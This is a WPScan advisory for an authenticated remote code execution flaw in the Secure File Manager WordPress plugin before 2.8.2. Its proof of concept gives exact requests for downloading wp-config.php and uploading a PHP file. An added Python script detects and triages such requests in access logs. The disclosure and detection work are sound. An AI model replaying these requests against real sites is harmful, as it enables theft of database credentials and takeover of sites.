WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Secure File Manager < 2.8.2 - Authenticated Remote Code Execution

Description

The Secure File Manager uses the elFinder libraries in an insecure way, allowing authenticated users to execute arbitrary file management commands.

v2.6 attempted to fix the issue by adding a CSRF nonce; however, the nonce is displayed to all logged-in users in the Dashboard via the Secure File Manager menu (even though that page shows an Unauthorized Access error for non-admin users).

Proof of Concept

Download the wp-config.php

< 2.6 - As an unauthenticated user, open /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php

< 2.8.2 - Log in as any user and open the Secure File Manager menu (wp-admin/admin.php?page=sfm_file_manager). It returns an Unauthorized Access error unless the user is an admin, but the page source still contains the value of sfmpNonceKey. Retrieve that value and append it to the URL above as a _wpnonce parameter:

/wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&_wpnonce=69f62e1414&cpath=/wp-admin/admin.php


RCE can be obtained as well, with a crafted request to upload a PHP file, e.g. /hello-user.php:

For < 2.8.2, get the nonce with the same technique as above.
For < 2.6, just remove the _wpnonce parameter.

POST /wp-content/plugins/secure-file-manager/vendor/elfinder/php/connector.minimal.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager
Content-Type: multipart/form-data; boundary=---------------------------32138351926630035821198693946
Content-Length: 851
Origin: http://127.0.0.1
Connection: close
Cookie: [Subscriber cookie]

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="reqid"

1770034af3e3c9
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="cmd"

upload
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="target"

l1_Lw
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="_wpnonce"

69f62e1414
-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="upload[]"; filename="hello-user.php"
Content-Type: text/plain

<?php echo 'failed'; ?>

-----------------------------32138351926630035821198693946
Content-Disposition: form-data; name="mtime[]"

1375102826
-----------------------------32138351926630035821198693946--
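As an added defender-side example (not WPScan's code and not the plugin's), the following Python script scans web-server access-log lines in combined format for direct requests to the elFinder connector path used in the PoC above, decodes the elFinder target hash so the analyst can see which file was requested (the hash l1_d3AtY29uZmlnLnBocA resolves to wp-config.php), and grades each hit for triage. The log lines, IP addresses and timestamps are constructed for the example. Legitimate admin use of the plugin also hits this endpoint, so the output is a list to review, not proof of compromise; a high-severity hit from an address with no admin session is what merits investigation.

```python
"""Triage access-log hits on the Secure File Manager elFinder connector.

Constructed example: parses combined-format log lines, keeps only requests
to connector.minimal.php, decodes the elFinder 'target' hash and grades
each request. Not part of the advisory or the plugin.
"""
import base64
import re
from dataclasses import dataclass
from urllib.parse import parse_qs, urlsplit

CONNECTOR = ("/wp-content/plugins/secure-file-manager/vendor/elfinder/php/"
             "connector.minimal.php")

# Combined log format: ip ident user [time] "METHOD URL PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# elFinder commands that create or change files; an uploaded .php file is the RCE path.
WRITE_CMDS = {"upload", "mkfile", "put", "rename", "paste", "rm", "archive", "extract"}


@dataclass
class Hit:
    ip: str
    method: str
    cmd: str
    target: str      # decoded path, or "" when absent or undecodable
    status: int
    severity: str


def decode_elfinder_hash(h: str) -> str:
    """Decode an elFinder hash such as l1_d3AtY29uZmlnLnBocA to its path.

    elFinder builds the hash as <volumeid>_<base64(path)> with '+/=' replaced
    by '-_.' and trailing '.' trimmed; this reverses that transformation.
    """
    if "_" not in h:
        return ""
    _, enc = h.split("_", 1)
    enc = enc.translate(str.maketrans("-_.", "+/="))
    enc += "=" * (-len(enc) % 4)          # restore stripped padding
    try:
        return base64.b64decode(enc, validate=True).decode("utf-8", "replace")
    except (ValueError, UnicodeDecodeError):
        return ""


def grade(method: str, cmd: str, target: str) -> str:
    """Rough severity: source download of a .php file or a write command is high."""
    if cmd == "file" and target.lower().endswith(".php"):
        return "high"       # e.g. wp-config.php, which holds database credentials
    if cmd in WRITE_CMDS:
        return "high"
    if method == "POST":
        return "medium"     # elFinder sends write commands by POST; cmd is in the body
    return "low"


def scan(lines):
    """Return a Hit for every log line that targets the connector directly."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["url"])
        if parts.path != CONNECTOR:
            continue
        qs = parse_qs(parts.query)
        cmd = qs.get("cmd", [""])[0]
        target = decode_elfinder_hash(qs.get("target", [""])[0])
        hits.append(Hit(m["ip"], m["method"], cmd, target, int(m["status"]),
                        grade(m["method"], cmd, target)))
    return hits


# Constructed sample lines modelled on the PoC URLs above; addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Nov/2020:10:01:02 +0000] "GET ' + CONNECTOR +
    '?cmd=file&target=l1_d3AtY29uZmlnLnBocA&download=1&cpath=/wp-admin/admin.php HTTP/1.1" '
    '200 3121 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Nov/2020:10:01:09 +0000] "POST ' + CONNECTOR + ' HTTP/1.1" '
    '200 96 "http://127.0.0.1/wp-admin/admin.php?page=sfm_file_manager" "Mozilla/5.0"',
    '198.51.100.4 - - [23/Nov/2020:10:02:00 +0000] "GET ' + CONNECTOR +
    '?cmd=open&target=l1_Lw&init=1 HTTP/1.1" 200 812 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [23/Nov/2020:10:02:30 +0000] "GET /wp-admin/admin.php?page=sfm_file_manager '
    'HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit.severity:6} {hit.ip:14} {hit.method:4} cmd={hit.cmd or '-':7} "
              f"target={hit.target or '-'} status={hit.status}")
```

Run against a real log with `scan(open("access.log"))`; the fourth sample line is ignored because it goes through wp-admin rather than the connector, which is the normal path for the plugin's UI. The hash decoder is the useful piece beyond this advisory: it turns any elFinder target value seen in logs or WAF alerts back into a readable path.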

Affects Plugins

secure-file-manager
Fixed in version 2.8.2

References

CVE
CVE-2020-35235
URL
https://blog.nintechnet.com/authenticated-rce-vulnerability-in-wordpress-secure-file-manager-plugin-unpatched/

Classification

Type

RCE

OWASP top 10
A1: Injection
CWE
CWE-94

Miscellaneous

Original Researcher

NinTechNet

Verified

Yes

WPVDB ID
47c1639f-4558-4cb6-8f50-e5e8564663c2

Timeline

Publicly Published

2020-11-23

Added

2020-11-23

Last Updated

2021-06-08
